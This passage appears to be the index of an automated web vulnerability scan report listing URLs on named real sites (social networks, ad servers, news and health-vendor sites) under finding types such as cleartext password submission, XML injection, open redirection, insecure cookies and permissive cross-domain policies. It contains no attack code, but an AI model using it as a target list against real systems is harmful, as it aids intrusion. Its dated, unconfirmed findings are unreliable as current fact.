7.74. http://api.trulia.com/crossdomain.xml

7.75. http://au.myspace.com/crossdomain.xml

7.76. http://b.myspace.com/crossdomain.xml

7.77. http://b1.adbrite.com/crossdomain.xml

7.78. http://check4.connect.facebook.com/crossdomain.xml

7.79. http://check4.facebook.com/crossdomain.xml

7.80. http://check6.connect.facebook.com/crossdomain.xml

7.81. http://check6.facebook.com/crossdomain.xml

7.82. http://clk.pointroll.com/crossdomain.xml

7.83. http://delb.opt.fimserve.com/crossdomain.xml

7.84. http://demr.opt.fimserve.com/crossdomain.xml

7.85. http://desb.opt.fimserve.com/crossdomain.xml

7.86. http://googleads.g.doubleclick.net/crossdomain.xml

7.87. http://images.trulia.com/crossdomain.xml

7.88. http://mm.chitika.net/crossdomain.xml

7.89. http://news.9REDACTED.com.au/crossdomain.xml

7.90. http://news.REDACTED/crossdomain.xml

7.91. http://optimized-by.rubiconproject.com/crossdomain.xml

7.92. http://s.youtube.com/crossdomain.xml

7.93. http://static.ak.connect.facebook.com/crossdomain.xml

7.94. http://static.ak.fbcdn.net/crossdomain.xml

7.95. http://thumbs.trulia.com/crossdomain.xml

7.96. http://tracking.quisma.com/crossdomain.xml

7.97. http://twittercounter.com/crossdomain.xml

7.98. http://www.awltovhc.com/crossdomain.xml

7.99. http://www.brisbanetimes.com.au/crossdomain.xml

7.100. http://www.connect.facebook.com/crossdomain.xml

7.101. http://www.facebook.com/crossdomain.xml

7.102. http://www.ftjcfx.com/crossdomain.xml

7.103. http://www.glam.de/crossdomain.xml

7.104. http://www.guardian.co.uk/crossdomain.xml

7.105. http://www.myspace.com/crossdomain.xml

7.106. http://www.realestate.com.au/crossdomain.xml

7.107. http://www.shopstyle.com/crossdomain.xml

7.108. http://www.stumbleupon.com/crossdomain.xml

7.109. http://www.theage.com.au/crossdomain.xml

7.110. http://www.tqlkg.com/crossdomain.xml

7.111. http://www.trulia.com/crossdomain.xml

7.112. http://www.watoday.com.au/crossdomain.xml

7.113. http://www.youtube.com/crossdomain.xml

7.114. http://api.twitter.com/crossdomain.xml

7.115. http://cms.myspacecdn.com/crossdomain.xml

7.116. http://stats.wordpress.com/crossdomain.xml

7.117. http://twitter.com/crossdomain.xml

7.118. http://v7.lscache6.c.youtube.com/crossdomain.xml

8. Silverlight cross-domain policy

8.1. http://ad-apac.doubleclick.net/clientaccesspolicy.xml

8.2. http://ad.au.doubleclick.net/clientaccesspolicy.xml

8.3. http://ads.pointroll.com/clientaccesspolicy.xml

8.4. http://api.bing.net/clientaccesspolicy.xml

8.5. http://cdn.eyewonder.com/clientaccesspolicy.xml

8.6. http://ecn.api.tiles.virtualearth.net/clientaccesspolicy.xml

8.7. http://h0.ortho.tiles.virtualearth.net/clientaccesspolicy.xml

8.8. http://h1.ortho.tiles.virtualearth.net/clientaccesspolicy.xml

8.9. http://h2.ortho.tiles.virtualearth.net/clientaccesspolicy.xml

8.10. http://h3.ortho.tiles.virtualearth.net/clientaccesspolicy.xml

8.11. http://img2.catalog.video.REDACTED.com/clientaccesspolicy.xml

8.12. http://pixel.33across.com/clientaccesspolicy.xml

8.13. http://rad.REDACTED.com/clientaccesspolicy.xml

8.14. http://secure-au.imrworldwide.com/clientaccesspolicy.xml

8.15. http://speed.pointroll.com/clientaccesspolicy.xml

8.16. http://stats.wordpress.com/clientaccesspolicy.xml

8.17. http://a1.bing4.com/clientaccesspolicy.xml

8.18. http://a2.bing4.com/clientaccesspolicy.xml

8.19. http://a3.bing4.com/clientaccesspolicy.xml

8.20. http://ts1.mm.bing.net/clientaccesspolicy.xml

9. Cleartext submission of password

9.1. http://cx.trizetto.com/

9.2. http://designers.glam.com/2011/04/29/wp-content/themes/glam_v1/glam-login/login_template.php

9.3. http://vpswebserver.com/

9.4. http://www.glam.com/profile

9.5. http://www.glam.com/wp-content/themes/glam_v1/glam-login/login_template.php

9.6. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/

9.7. http://www.thefashionablegal.com/wp-login.php

9.8. http://www.thefashionablehousewife.com/wp-login.php

9.9. http://www.thesunchronicle.com/articles/2011/05/02/rehoboth/9166782.txt

10. XML injection

10.1. http://amch.questionmarket.com/adsc/d891575/2/891856/adscout.php [REST URL parameter 1]

10.2. http://loadus.exelator.com/load/ [REST URL parameter 1]

10.3. http://loadus.exelator.com/load/net.php [REST URL parameter 1]

10.4. http://loadus.exelator.com/load/net.php [REST URL parameter 2]

10.5. http://media.onsugar.com/v553/static/richmedia/ISM-300x250.swf [REST URL parameter 1]

10.6. http://media.onsugar.com/v553/static/richmedia/ISM-300x250.swf [REST URL parameter 2]

10.7. http://media.onsugar.com/v553/static/richmedia/ISM-300x250.swf [REST URL parameter 3]

10.8. http://media.onsugar.com/v553/static/richmedia/ISM-300x250.swf [REST URL parameter 4]

10.9. http://pixel.quantserve.com/seg/r [REST URL parameter 1]

10.10. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

10.11. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

10.12. http://s.ytimg.com/yt/swfbin/apiplayer3-vflDDA3kt.swf [REST URL parameter 2]

10.13. http://s.ytimg.com/yt/swfbin/apiplayer3-vflDDA3kt.swf [REST URL parameter 3]

10.14. http://tracking.quisma.com/v.cfs [REST URL parameter 1]

10.15. http://vincentfretin.ecreall.com/favicon.ico [REST URL parameter 1]

10.16. http://www.glam.com/topic/feed/ [REST URL parameter 1]

10.17. http://www.glam.com/xmlrpc.php [REST URL parameter 1]

10.18. http://www.righthealth.com/c-javascripts/kapp_relevance.js [REST URL parameter 1]

10.19. http://www.righthealth.com/c-javascripts/kapp_relevance.js [REST URL parameter 2]

10.20. http://www.righthealth.com/images/health/favicon.ico [REST URL parameter 1]

10.21. http://www.righthealth.com/images/health/favicon.ico [REST URL parameter 2]

10.22. http://www.righthealth.com/javascripts/adore/ad2.html [REST URL parameter 1]

10.23. http://www.righthealth.com/javascripts/adore/ad2.html [REST URL parameter 2]

10.24. http://www.righthealth.com/javascripts/adore/ad2.html [REST URL parameter 3]

10.25. http://www.righthealth.com/javascripts/cache/topic_bottom-righthealth-sem-chimborazo-151793.js [REST URL parameter 1]

10.26. http://www.righthealth.com/javascripts/cache/topic_top-s_righthealth-sem-chimborazo-151793.js [REST URL parameter 1]

10.27. http://www2b.abc.net.au/tmb/Client/Board.aspx [REST URL parameter 3]

10.28. http://www2b.abc.net.au/tmb/Client/MessageBoardList.aspx [REST URL parameter 3]

11. SSL cookie without secure flag set

11.1. https://admin.iconnection.com/login.aspx

11.2. https://auth.tek.com/mytek/faces/forgotpassword.jsp

11.3. https://auth.tek.com/mytek/faces/loginregistration.jsp

11.4. https://auth.tek.com/mytek/faces/scripts/forms.js

11.5. https://auth.tek.com/mytek/faces/scripts/jsr_class.js

11.6. https://auth.tek.com/mytek/faces/scripts/sm.js

11.7. https://auth.tek.com/mytek/faces/scripts/webservice.js

11.8. https://customer.trizetto.com/OnyxCustomerPortal/

11.9. https://customer.trizetto.com/OnyxCustomerPortal/home.asp

11.10. https://customer.trizetto.com/OnyxCustomerPortal/menu.asp

11.11. https://idesk.infocrossing.com/

11.12. https://support.logrhythm.com/ics/default.asp

11.13. https://support.logrhythm.com/ics/support/LeftSplash.asp

11.14. https://support.logrhythm.com/ics/support/default.asp

11.15. https://support.logrhythm.com/ics/support/mylogin.asp

11.16. https://tracker.i-structure.com/

11.17. https://www.idexpertscorp.com/RADAR/

11.18. https://www.idexpertscorp.com/dbhc/

11.19. https://www.medicare-solution.com/mss/home/Index.jsp

11.20. https://www1.gotomeeting.com/register/451586600

11.21. https://support.logrhythm.com/FileManagement/Download/08bdb7021bc34da1829ccb8c216d97ba

11.22. https://support.logrhythm.com/FileManagement/Download/e04c558f41be497b8f6340964105111b

11.23. https://www.hipaastore.com/index.php

12. Session token in URL

12.1. http://gw-services.vtrenz.net/WebCookies/RegisterWebPageVisit.cfm

12.2. http://l.sharethis.com/pview

12.3. http://nmp.newsgator.com/ngbuzz/buzz.ashx

12.4. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/ps/ifr

12.5. http://www.facebook.com/extern/login_status.php

12.6. http://www.google.com/realtimejs

12.7. http://www.topcareerschools.com/s/279-390/12823153/

13. SSL certificate

13.1. https://admin.iconnection.com/

13.2. https://auth.tek.com/

13.3. https://owa.iconnection.com/

13.4. https://www.hipaastore.com/

13.5. https://clientcommunity.touchnet.com/

13.6. https://customer.trizetto.com/

13.7. https://idesk.infocrossing.com/

13.8. https://support.logrhythm.com/

13.9. https://tracker.i-structure.com/

13.10. https://www.idexpertscorp.com/

13.11. https://www.medicare-solution.com/

13.12. https://www.placemyad.com.au/

13.13. https://www1.gotomeeting.com/

14. Open redirection

14.1. http://1.gravatar.com/avatar/b530ef61ccf43de890b51db56fe3b417 [d parameter]

14.2. http://clk.pointroll.com/bc/ [clickurl parameter]

14.3. http://enjmp.com/links/ [redir parameter]

14.4. http://i.w55c.net/ping_match.gif [rurl parameter]

14.5. http://rd.apmebf.com/w/get.media [host parameter]

14.6. http://www30a2.glam.com/gad/click.act [0390-_urlenc%3D1-_gclickid%3Dgaclk4dbeab6768481-_advid%3D2207134-_adid%3D5000034269-_crid%3D500024892-_aipid%3D201105020550-_ge_%3D1%5E2%5E86b651121110f17017fc49e94023871f-ord%3D6433973438106477-afid%3D0-dsid%3D629717-sz%3D300x250-zone%3D%2F-sid%3D116391130334874196611-tile%3D3-seq%3D1-tt%3Dj-atf%3D1-url%3D00001b-flg%3D65-u%3Db006300739t1qn3g329%2Cf0f12sa%2Cg10001t-_gclick_gaclk4dbeab6768481 parameter]

14.7. http://www30a2.glam.com/gad/click.act [0395-_urlenc%3D1-_gclickid%3Dgaclk4dbeab8c82a2c-_advid%3D1496576-_adid%3D5000037476-_crid%3D500025060-_aipid%3D201105020550-_ge_%3D1%5E2%5E74c8329596917677db0f6729cea21950-ord%3D7355434447526932-afid%3D444496-dsid%3D444496-sz%3D300x250-zone%3D%2F-sid%3D116391130334874196611-tile%3D2-seq%3D1-tt%3Dj-atf%3D1-url%3D00001b-flg%3D64-u%3Db006215kwup1qn3h5or%2Cf0f12sa%2Cg10001s-_gclick_gaclk4dbeab8c82a2c parameter]

14.8. http://www30a2.glam.com/gad/click.act [0395-_urlenc%3D1-_gclickid%3Dgaclk4dbeab9d115b9-_advid%3D1496576-_adid%3D5000037476-_crid%3D500025060-_aipid%3D201105020550-_ge_%3D1%5E2%5E0290f85105ed3b1643656c29f374dce2-ord%3D7453895208891481-afid%3D526139-dsid%3D526139-sz%3D300x250-zone%3D%2F-sid%3D116391130334874196611-tile%3D2-seq%3D1-tt%3Dj-atf%3D1-url%3D00001b-flg%3D64-u%3Db00624ved011qn3hgmi%2Cf0f12sa%2Cg10001s-_gclick_gaclk4dbeab9d115b9 parameter]

14.9. http://www30a2.glam.com/gad/click.act [0396-_urlenc%3D1-_gclickid%3Dgaclk4dbeac7e98e3b-_advid%3D50002348-_adid%3D5000039404-_crid%3D500028679-_aipid%3D201105020558-_ge_%3D1%5E2%5Ec5a4fa25299e494dabd350a318327c8a-ord%3D1613273131661117-afid%3D444496-dsid%3D444496-sz%3D300x250-zone%3D%2F-sid%3D116391130334874196611-tile%3D2-seq%3D1-tt%3Dj-atf%3D1-url%3D6z09gi-flg%3D64-u%3Db00222w2epr1qn3nw6r%2Cf0f12sa%2Cg10001s-_gclick_gaclk4dbeac7e98e3b parameter]

15. Cookie scoped to parent domain

15.1. http://api.twitter.com/1/statuses/user_timeline.json

15.2. https://auth.tek.com/mytek/faces/forgotpassword.jsp

15.3. https://auth.tek.com/mytek/faces/loginregistration.jsp

15.4. https://auth.tek.com/mytek/faces/scripts/forms.js

15.5. https://auth.tek.com/mytek/faces/scripts/jsr_class.js

15.6. https://auth.tek.com/mytek/faces/scripts/sm.js

15.7. https://auth.tek.com/mytek/faces/scripts/webservice.js

15.8. http://e-sites2.tek.com/mytek/faces/resourcelogin.jsp

15.9. http://e-sites2.tek.com/mytek/faces/scripts/forms.js

15.10. http://e-sites2.tek.com/mytek/faces/scripts/jsr_class.js

15.11. http://e-sites2.tek.com/mytek/faces/scripts/sm.js

15.12. http://e-sites2.tek.com/mytek/faces/scripts/webservice.js

15.13. http://e-sites2.tek.com/mytek/faces/startresource.jsp

15.14. http://glamnewlive.disqus.com/remote_auth.js

15.15. http://t.mookie1.com/t/v1/imp

15.16. http://www.patlive.com/appointment-scheduling/

15.17. http://www.topcareerschools.com/s/279-390/12823153/

15.18. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

15.19. http://ad.afy11.net/ad

15.20. http://ad.amgdgt.com/ads/

15.21. http://ad.linksynergy.com/fs-bin/show

15.22. http://ad.linksynergy.com/fs-bin/show

15.23. http://ad.turn.com/server/ads.js

15.24. http://ad.turn.com/server/pixel.htm

15.25. http://ad.yabuka.com/statsin/adframe/693/300x250

15.26. http://ad.yabuka.com/statsin/adframe/903/300x250

15.27. http://adfarm.mediaplex.com/ad/js/6726-112732-1178-13

15.28. http://ads.adbrite.com/adserver/behavioral-data/8201

15.29. http://ads.adbrite.com/adserver/behavioral-data/8204

15.30. http://ads.adbrite.com/adserver/vdi/682865

15.31. http://ads.adbrite.com/adserver/vdi/712156

15.32. http://ads.adbrite.com/adserver/vdi/742697

15.33. http://ads.adbrite.com/adserver/vdi/753292

15.34. http://ads.adbrite.com/adserver/vdi/779045

15.35. http://ads.adbrite.com/adserver/vdi/810647

15.36. http://ads.adbrite.com/adserver/vdi/830697

15.37. http://ads.pointroll.com/PortalServe/

15.38. http://ads.revsci.net/adserver/ako

15.39. http://ads.revsci.net/adserver/ako

15.40. http://ads.revsci.net/adserver/ako

15.41. http://ads.revsci.net/adserver/ako

15.42. http://ads.revsci.net/adserver/ako

15.43. http://ads.revsci.net/adserver/ako

15.44. http://ads.revsci.net/adserver/ako

15.45. http://ads.revsci.net/adserver/ako

15.46. http://ads.revsci.net/adserver/ako

15.47. http://ads.revsci.net/adserver/ako

15.48. http://ads.revsci.net/adserver/ako

15.49. http://ads.revsci.net/adserver/ako

15.50. http://ads.revsci.net/adserver/ako

15.51. http://ads.revsci.net/adserver/ako

15.52. http://ads.revsci.net/adserver/ako

15.53. http://ads.revsci.net/adserver/ako

15.54. http://ads.revsci.net/adserver/ako

15.55. http://ads.revsci.net/adserver/ako

15.56. http://ads.revsci.net/adserver/ako

15.57. http://ads.revsci.net/adserver/ako

15.58. http://ads.revsci.net/adserver/ako

15.59. http://ads.revsci.net/adserver/ako

15.60. http://ads.specificmedia.com/serve/v=5

15.61. http://ads2.adbrite.com/v0/ad

15.62. http://ads2.adbrite.com/v0/ad

15.63. http://afe.specificclick.net/

15.64. http://altfarm.mediaplex.com/ad/js/13001-83639-12284-11

15.65. http://altfarm.mediaplex.com/ad/js/13966-95815-19269-5

15.66. http://altfarm.mediaplex.com/ad/js/17975-126683-12284-1

15.67. http://amch.questionmarket.com/adsc/d724925/17/725047/adscout.php

15.68. http://amch.questionmarket.com/adsc/d724925/18/725047/adscout.php

15.69. http://amch.questionmarket.com/adsc/d724925/4/725047/adscout.php

15.70. http://amch.questionmarket.com/adsc/d724925/9/725047/adscout.php

15.71. http://amch.questionmarket.com/adsc/d891575/2/891856/adscout.php

15.72. http://amch.questionmarket.com/adsc/d908201/2/41838359/adscout.php

15.73. http://amch.questionmarket.com/adscgen/st.php

15.74. http://ar.voicefive.com/b/wc_beacon.pli

15.75. http://ar.voicefive.com/bmx3/broker.pli

15.76. http://au.myspace.com/

15.77. http://b.scorecardresearch.com/b

15.78. http://b.scorecardresearch.com/p

15.79. http://b.scorecardresearch.com/r

15.80. http://b.voicefive.com/b

15.81. http://b3.mookie1.com/1/TRACK_Radioshack/Exelate/DYN2011Q1/X_TE_ALL/1x1/11304348270.6228@Bottom3

15.82. http://bh.contextweb.com/bh/rtset

15.83. http://bidder.mathtag.com/iframe/notify

15.84. http://bs.serving-sys.com/BurstingPipe/adServer.bs

15.85. http://c.atdmt.com/c.gif

15.86. http://c.REDACTED/c.gif

15.87. http://c.statcounter.com/t.php

15.88. http://c7.zedo.com/bar/v16-405/c5/jsc/gl.js

15.89. http://cm.au.REDACTED.overture.com/js_flat_1_0/

15.90. http://cm.netseer.com/redirect

15.91. http://REDACTED/js_1_0/

15.92. http://d.p-td.com/r/du/id/L21rdC80L21waWQvMzA0NzA4OQ

15.93. http://d7.zedo.com/bar/v16-405/d3/jsc/gl.js

15.94. http://delb.opt.fimserve.com/adopt/

15.95. http://demr.opt.fimserve.com/adopt/

15.96. http://desb.opt.fimserve.com/adopt/

15.97. http://glam.grapeshot.co.uk/main/redirect.cgi

15.98. http://glam.ivwbox.de/2004/01/survey.js

15.99. http://glam.ivwbox.de/blank.gif

15.100. http://glam.ivwbox.de/cgi-bin/ivw/CP/GLA_UK_123456

15.101. http://hits.guardian.co.uk/b/ss/guardiangu-music,guardiangu-network/1/H.22.1/s33948350739665

15.102. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/80617/0/vj

15.103. http://i.w55c.net/ping_match.gif

15.104. http://ib.adnxs.com/ab

15.105. http://ib.adnxs.com/acb

15.106. http://ib.adnxs.com/getuid

15.107. http://ib.adnxs.com/if

15.108. http://ib.adnxs.com/mapuid

15.109. http://ib.adnxs.com/ptj

15.110. http://ib.adnxs.com/ptj

15.111. http://ib.adnxs.com/ptj

15.112. http://ib.adnxs.com/ptj

15.113. http://ib.adnxs.com/ptj

15.114. http://ib.adnxs.com/ptj

15.115. http://ib.adnxs.com/ptj

15.116. http://ib.adnxs.com/ptj

15.117. http://ib.adnxs.com/ptj

15.118. http://ib.adnxs.com/ptj

15.119. http://ib.adnxs.com/ptj

15.120. http://ib.adnxs.com/ptj

15.121. http://ib.adnxs.com/ptj

15.122. http://ib.adnxs.com/ptj

15.123. http://ib.adnxs.com/seg

15.124. http://ib.adnxs.com/setuid

15.125. http://ib.adnxs.com/ttj

15.126. http://id.google.com/verify/EAAAAF5lv2XjP7uWOyR1swCFb64.gif

15.127. http://id.google.com/verify/EAAAAN1EBcu_tAopVv8fuxVAz2g.gif

15.128. http://idpix.media6degrees.com/orbserv/hbpix

15.129. http://image2.pubmatic.com/AdServer/Pug

15.130. http://leadback.advertising.com/adcedge/lb

15.131. http://loadus.exelator.com/load/

15.132. http://log.c12s.com/redir/327090/0/740/1396695815192695/0/643921/53/100004/1.ver

15.133. http://lp.idexpertscorp.com/hitech-whitepapera/IDE-Unbounce-footer-A.original_4v7u278ezbx8it4w.jpg

15.134. http://lp.idexpertscorp.com/hitech-whitepapera/bg-grad-fade-edge-ul.original.png

15.135. http://lp.idexpertscorp.com/hitech-whitepapera/bullet.original.jpg

15.136. http://lp.idexpertscorp.com/hitech-whitepapera/button-down.original.jpg

15.137. http://lp.idexpertscorp.com/hitech-whitepapera/button-up.original.jpg

15.138. http://lp.idexpertscorp.com/hitech-whitepapera/form-bottom-CORRECT.original.jpg

15.139. http://lp.idexpertscorp.com/hitech-whitepapera/form-header.original.jpg

15.140. http://lp.idexpertscorp.com/hitech-whitepapera/page_defaults.css

15.141. http://lp.idexpertscorp.com/hitech-whitepapera/reset.css

15.142. http://lp.idexpertscorp.com/hitech-whitepapera/testimonial-arrow.original.gif

15.143. http://lp.idexpertscorp.com/hitech-whitepapera/top-fade.original.jpg

15.144. http://lp.idexpertscorp.com/hitech-whitepapera/version-1-header.original_4v7ufsth145maha8.jpg

15.145. http://m.adnxs.com/msftcookiehandler

15.146. http://map.media6degrees.com/orbserv/aopix

15.147. http://map.media6degrees.com/orbserv/hbpix

15.148. http://media.fastclick.net/w/get.media

15.149. http://media.trafficmp.com/a/js

15.150. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnewsau/ros/728x90/jx/ss/a/1623201161@Top1

15.151. http://nmhiltonhead.112.2o7.net/b/ss/nmhiltonhead/1/H.20.3/s3688769728876

15.152. http://oas.guardian.co.uk/RealMedia/ads/adstream_mjx.ads/www.guardian.co.uk/music/2011/may/01/ray-davies-kinks-meltdown-interview/oas.html/1203925231@Top,Middle2,Right1,x31

15.153. http://optimized-by.rubiconproject.com/a/6291/9346/15214-2.js

15.154. http://optimized-by.rubiconproject.com/a/7725/12338/22682-15.js

15.155. http://optimized-by.rubiconproject.com/a/7725/12338/22682-2.js

15.156. http://optimized-by.rubiconproject.com/a/7845/12566/22544-2.html

15.157. http://optimized-by.rubiconproject.com/a/7845/12566/22544-9.html

15.158. http://optimized-by.rubiconproject.com/a/7845/12566/26835-15.html

15.159. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.js

15.160. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.js

15.161. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.js

15.162. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.js

15.163. http://optimized-by.rubiconproject.com/a/7968/13027/24102-15.js

15.164. http://optimized-by.rubiconproject.com/a/7968/13027/24103-2.js

15.165. http://panel.kantarmedia.com/0/KantarMedia-Panel/panel/set_panel.html

15.166. http://phoenix.untd.com/TRCK/RGST

15.167. http://pix04.revsci.net/E05516/b3/0/3/0902121/268098805.js

15.168. http://pix04.revsci.net/G08769/b3/0/3/0902121/439307182.js

15.169. http://pix04.revsci.net/G08769/b3/0/3/0902121/448568946.js

15.170. http://pix04.revsci.net/G08769/b3/0/3/0902121/47587256.js

15.171. http://pix04.revsci.net/G08769/b3/0/3/0902121/565634184.js

15.172. http://pix04.revsci.net/G08769/b3/0/3/0902121/702929375.js

15.173. http://pix04.revsci.net/G08769/b3/0/3/0902121/717262760.js

15.174. http://pix04.revsci.net/G08769/b3/0/3/0902121/797060244.js

15.175. http://pix04.revsci.net/G08769/b3/0/3/0902121/973395291.js

15.176. http://pixel.33across.com/ps/

15.177. http://pixel.33across.com/ps/189233/

15.178. http://pixel.33across.com/ps/273884/

15.179. http://pixel.33across.com/ps/332046/

15.180. http://pixel.33across.com/ps/41208/

15.181. http://pixel.33across.com/ps/425905/

15.182. http://pixel.33across.com/ps/500284/

15.183. http://pixel.33across.com/ps/682989/

15.184. http://pixel.invitemedia.com/data_sync

15.185. http://pixel.invitemedia.com/pixel

15.186. http://pixel.quantserve.com/pixel

15.187. http://pixel.quantserve.com/pixel/p-01-0VIaSjnOLg.gif

15.188. http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif

15.189. http://pixel.quantserve.com/seg/r

15.190. http://pixel.rubiconproject.com/di.php

15.191. http://pixel.rubiconproject.com/tap.php

15.192. http://pixel.rubiconproject.com/tap.php

15.193. http://pixel.rubiconproject.com/tap.php

15.194. http://pixel.rubiconproject.com/tap.php

15.195. http://pixel.rubiconproject.com/tap.php

15.196. http://pixel.rubiconproject.com/tap.php

15.197. http://pixel.rubiconproject.com/tap.php

15.198. http://r.openx.net/set

15.199. http://r.turn.com/r/beacon

15.200. http://r1-ads.ace.advertising.com/site=743833/size=300250/u=2/bnum=65003685/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.thesunchronicle.com%252Farticles%252F2011%252F05%252F02%252Frehoboth%252F9166782.txt

15.201. http://r1-ads.ace.advertising.com/site=781800/size=728090/u=2/bnum=78594486/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.islandpacket.com%252F2011%252F05%252F02%252F1640363%252Fwill-killing-osama-kill-the-movement.html

15.202. http://r1-ads.ace.advertising.com/site=795866/size=728090/u=2/bnum=47065580/hr=15/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.righthealth.com%252Ftopic%252FWhat_Is_Hipaa%253Fp%253Dl%2526as%253DREDACTED%2526ac%253D529%2526kgl%253D38620759

15.203. http://r1-ads.ace.advertising.com/site=799695/size=300250/u=2/bnum=54085448/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.theage.com.au%252Fnational%252Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html

15.204. http://r1-ads.ace.advertising.com/site=801645/size=728090/u=2/bnum=28266332/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.dailytelegraph.com.au%252Fnews%252Fbreaking-news%252Ftony-abbott-says-migration-proposals-are-weak%252Fstory-e6freuz0-1226045133021%253Ffrom%253Dpublic_rss

15.205. http://r1-ads.ace.advertising.com/site=801645/size=728090/u=2/bnum=29579703/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.theaustralian.com.au%252Fnews%252Fnation%252Fabbott-a-hero-on-troubled-christmas-island%252Fstory-e6frg6nf-1226045245809

15.206. http://r1-ads.ace.advertising.com/site=801647/size=300250/u=2/bnum=65424947/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.news.com.au%252Fbreaking-news%252Fnational%252Fchristmas-island-detainee-sews-lips-together%252Fstory-e6frfku9-1226044502823

15.207. http://rd.apmebf.com/w/get.media

15.208. http://s.xp1.ru4.com/meta

15.209. http://segment-pixel.invitemedia.com/pixel

15.210. http://segment-pixel.invitemedia.com/set_partner_uid

15.211. http://sync.mathtag.com/sync/img

15.212. http://t.invitemedia.com/track_imp

15.213. http://tacoda.at.atwola.com/rtx/r.js

15.214. http://tag.contextweb.com/TagPublish/getad.aspx

15.215. http://tags.bluekai.com/site/2312

15.216. http://tags.bluekai.com/site/2312

15.217. http://tags.bluekai.com/site/2731

15.218. http://tags.bluekai.com/site/2748

15.219. http://tags.bluekai.com/site/3358

15.220. http://tags.bluekai.com/site/3890

15.221. http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/

15.222. http://tap.rubiconproject.com/oz/feeds/targus/profile

15.223. http://tap.rubiconproject.com/oz/sensor

15.224. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js

15.225. http://trgca.opt.fimserve.com/fp.gif

15.226. http://video.REDACTED.com/soapboxservice2.aspx

15.227. http://widget.linkwithin.com/get_custom_js

15.228. http://widget2.linkwithin.com/get_custom_js

15.229. http://www.abc.net.au/7.30/content/2011/js/swfobject.js

15.230. http://www.abc.net.au/7.30/content/2011/s3200763.htm

15.231. http://www.abc.net.au/crossdomain.xml

15.232. http://www.abc.net.au/favicon.ico

15.233. http://www.abc.net.au/includes/scripts/global.js

15.234. http://www.abc.net.au/news/assets/v5/images/common/footer-bg.png

15.235. http://www.abc.net.au/news/assets/v5/images/common/programs-footer.png

15.236. http://www.abc.net.au/res/abc/logos/footer_logo.png

15.237. http://www.abc.net.au/res/abc/logos/nav_logo.png

15.238. http://www.abc.net.au/res/abc/styles/bg/divider.png

15.239. http://www.abc.net.au/res/abc/styles/bg/footer.png

15.240. http://www.abc.net.au/res/abc/styles/bg/header.png

15.241. http://www.abc.net.au/res/abc/styles/bg/search.png

15.242. http://www.abc.net.au/res/abc/styles/handheld.css

15.243. http://www.abc.net.au/res/abc/styles/print.css

15.244. http://www.abc.net.au/res/abc/styles/screen.css

15.245. http://www.abc.net.au/res/abc/submenus.htm

15.246. http://www.abc.net.au/res/libraries/abcjs/abc.js

15.247. http://www.abc.net.au/res/libraries/cinerama2/cinerama.swf

15.248. http://www.abc.net.au/res/libraries/cinerama2/cinerama_skin_external.swf

15.249. http://www.abc.net.au/res/libraries/cinerama2/scripts/cinerama2.js

15.250. http://www.abc.net.au/res/libraries/cinerama2/scripts/cinerama2_functions.js

15.251. http://www.abc.net.au/res/libraries/cinerama2/scripts/modernizr-1.6.min.js

15.252. http://www.abc.net.au/res/libraries/jquery/jquery-latest-min.js

15.253. http://www.abc.net.au/res/libraries/stats/webTrends/webtrends.js

15.254. http://www.abc.net.au/res/libraries/swfobject/swfobject-2.2.js

15.255. http://www.abc.net.au/res/sites/7.30/images/730-bg.jpg

15.256. http://www.abc.net.au/res/sites/7.30/images/730-content-bg.jpg

15.257. http://www.abc.net.au/res/sites/7.30/images/730-header.jpg

15.258. http://www.abc.net.au/res/sites/7.30/images/730-nav-bg.jpg

15.259. http://www.abc.net.au/res/sites/7.30/images/730-search-button.jpg

15.260. http://www.abc.net.au/res/sites/7.30/styles/printv5.css

15.261. http://www.abc.net.au/res/sites/7.30/styles/screenv5.css

15.262. http://www.abc.net.au/reslib/201104/r757251_6333237.jpg

15.263. http://www.abc.net.au/reslib/201104/r757251_6333241.jpg

15.264. http://www.bing.com/

15.265. http://www.bing.com/twitter/s/icon_rt.gif

15.266. http://www.facebook.com/home.php

15.267. http://www.flickr.com/badge_code_v2.gne

15.268. http://www.glam.de/

15.269. http://www.guardian.co.uk/music/2011/may/01/ray-davies-kinks-meltdown-interview

15.270. http://www.orgsites.com/index.html

15.271. http://www.saksfifthavenue.com/main/ProductDetail.jsp

15.272. http://www.shopstyle.com/browse

15.273. http://www.stumbleupon.com/submit

15.274. http://www.webhostingtalk.com/showthread.php

15.275. http://www.wtp101.com/ab_sync

15.276. http://www.youtube.com/api_video_info

